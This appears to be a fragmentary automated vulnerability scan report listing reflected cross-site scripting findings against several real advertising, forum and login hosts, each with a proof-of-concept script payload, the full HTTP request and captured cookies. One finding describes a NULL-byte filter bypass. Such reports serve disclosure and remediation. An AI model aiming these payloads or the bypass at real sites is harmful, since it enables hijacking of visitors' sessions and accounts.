HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=527F87460647F92F1D5DF43DA9C49229; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 26 Apr 2011 14:21:11 GMT Connection: close
The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 353f1'-alert(1)-'63a73adbc30 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=ad&ad_size=728x90353f1'-alert(1)-'63a73adbc30§ion=1712152 HTTP/1.1 Host: adserving.cpxinteractive.com Proxy-Connection: keep-alive Referer: http://www.nuclearpesticide.com/?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Tue, 26 Apr 2011 13:46:35 GMT Content-Length: 616
The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 939d5'-alert(1)-'00990139a3b was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=ad&ad_size=728x90§ion=1712152939d5'-alert(1)-'00990139a3b HTTP/1.1 Host: adserving.cpxinteractive.com Proxy-Connection: keep-alive Referer: http://www.nuclearpesticide.com/?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:39 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Tue, 26 Apr 2011 13:46:39 GMT Content-Length: 616
The value of the instance_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c50b0"><script>alert(1)</script>1231ca00dba was submitted in the instance_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the lastpage request parameter is copied into the HTML document as plain text between tags. The payload c8b61<script>alert(1)</script>2cde569026c was submitted in the lastpage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.12. http://afreshbunch.com/forums/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://afreshbunch.com
Path:
/forums/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940ab"><script>alert(1)</script>1bee2ef731a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003bd70"><script>alert(1)</script>a70dc90eb4a was submitted in the page parameter. This input was echoed as 3bd70"><script>alert(1)</script>a70dc90eb4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 24105<script>alert(1)</script>d1dfb28578f was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Apr 2011 14:21:27 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the ncu request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b413'><script>alert(1)</script>4a29843458a was submitted in the ncu parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2423626&PluID=0&w=300&h=250&ord=20110426142246&ifrm=2&ncu=http%3A%2F%2Fspamlaws.us.intellitxt.com%2Fal.asp%3Fts%3D20110426142113%26at%3D39%26ipid%3D10143%26di%3D31742909%26syid%3D0%26adid%3D0%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Db5e073b8ec12fc1181fc2fd3b1a46a79%26ll%3D0%26hbll%3D0%26id%3DFCBEC610ABA64BC3BAF092D3EB42D7C0%26idh%3De18a41658ec9c9c740dc1b91edbc4646%26pvu%3D59196390591647FA9372FACB8C10DBA5%26pvm%3D35e167e1c66fee62be98fe397190a726%26uf%3D0%26ur%3D0%26llip%3D0%26ttv%3D1%26redir%3D1b413'><script>alert(1)</script>4a29843458a HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWg07aw00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui
The value of the ncu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0f14</script><script>alert(1)</script>21c15be81c4 was submitted in the ncu parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2423626&PluID=0&w=300&h=250&ord=20110426142246&ifrm=2&ncu=http%3A%2F%2Fspamlaws.us.intellitxt.com%2Fal.asp%3Fts%3D20110426142113%26at%3D39%26ipid%3D10143%26di%3D31742909%26syid%3D0%26adid%3D0%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Db5e073b8ec12fc1181fc2fd3b1a46a79%26ll%3D0%26hbll%3D0%26id%3DFCBEC610ABA64BC3BAF092D3EB42D7C0%26idh%3De18a41658ec9c9c740dc1b91edbc4646%26pvu%3D59196390591647FA9372FACB8C10DBA5%26pvm%3D35e167e1c66fee62be98fe397190a726%26uf%3D0%26ur%3D0%26llip%3D0%26ttv%3D1%26redir%3Df0f14</script><script>alert(1)</script>21c15be81c4 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWg07aw00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cfd8a<script>alert(1)</script>72f799469a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.comodo.com/p.json?callback=_ate.ad.hprcfd8a<script>alert(1)</script>72f799469a8&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.comodo.com%2Fbusiness-security%2Fpci-compliance%2Fpci-scan.php&scb19p HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; psc=4; di=1303662902.60|1303662902.1OD|1303662902.1FE; dt=X; uid=4dab4fa85facd099
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 89d32<script>alert(1)</script>427b70698ad was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-5253809430940410%26output%3Dhtml%26h%3D600%26slotname%3D1644788465%26w%3D120%26lmt%3D1303845665%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.spamlaws.com%252Fspam-blocker.html%26dt%3D1303827665898%26bpp%3D8%26shv%3Dr20110420%26jsv%3Dr20110415%26prev_slotnames%3D8319948044%252C1020003104%252C9565114904%252C0023118579%26correlator%3D1303827663964%26frm%3D0%26adk%3D222637912%26ga_vid%3D902403751.1303827664%26ga_sid%3D1303827664%26ga_hid%3D1845423620%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D965%26bih%3D956%26fu%3D0%26ifi%3D5%26dtd%3D13%26xpc%3DgvNjmv27ZD%26p%3Dhttp%253A%2F%2Fwww.spamlaws.com&uid=ZC45X9Axu6NOUFfX_28966789d32<script>alert(1)</script>427b70698ad&xy=0%2C0&wh=120%2C600&vchannel=69114&cid=166308&iad=1303827681130-85943930735811580&cookieenabled=1&screenwh=1920%2C1200&adwh=120%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888
The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd50a'-alert(1)-'5ee4841495 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ab?enc=pHA9CtcjE0CkcD0K1yMTQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAcx9FGwAAAAA.&tt_code=vert-314&udj=uf%28%27a%27%2C+9797%2C+1303827657%29%3Buf%28%27c%27%2C+52368%2C+1303827657%29%3Buf%28%27r%27%2C+173252%2C+1303827657%29%3Bppv%288991%2C+%276718109068834708565%27%2C+1303827657%2C+1303870857%2C+52368%2C+25553%29%3B&cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ..dd50a'-alert(1)-'5ee4841495&referrer=http://www.spamlaws.com/spam-blocker.html&pp=TbbUyQAERXEK7FrIESl1USKqAlzx_1NgCAINaw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; sess=1
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 14:21:39 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:39 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:39 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i; path=/; expires=Mon, 25-Jul-2011 14:21:39 GMT; domain=.adnxs.com; HttpOnly Date: Tue, 26 Apr 2011 14:21:39 GMT Content-Length: 1587
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 117b1'%3balert(1)//a202ffbf5ef was submitted in the redir parameter. This input was echoed as 117b1';alert(1)//a202ffbf5ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ptj?member=541&size=728x90&inv_code=1712152&referrer=http://www.nuclearpesticide.com/%3Fepl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1712152117b1'%3balert(1)//a202ffbf5ef HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.nuclearpesticide.com/?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; sess=1
The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d08e3"><script>alert(1)</script>82ebadbbe5e was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login_multiple/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3Ed08e3"><script>alert(1)</script>82ebadbbe5e HTTP/1.1 Host: login.sisna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the RelayState request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e0ea"><script>alert(1)</script>b83bede8fd2 was submitted in the RelayState parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D28e0ea"><script>alert(1)</script>b83bede8fd2 HTTP/1.1 Host: login.sisna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the SAMLRequest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ad7"><script>alert(1)</script>2c2eb30ca40 was submitted in the SAMLRequest parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D59ad7"><script>alert(1)</script>2c2eb30ca40&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2 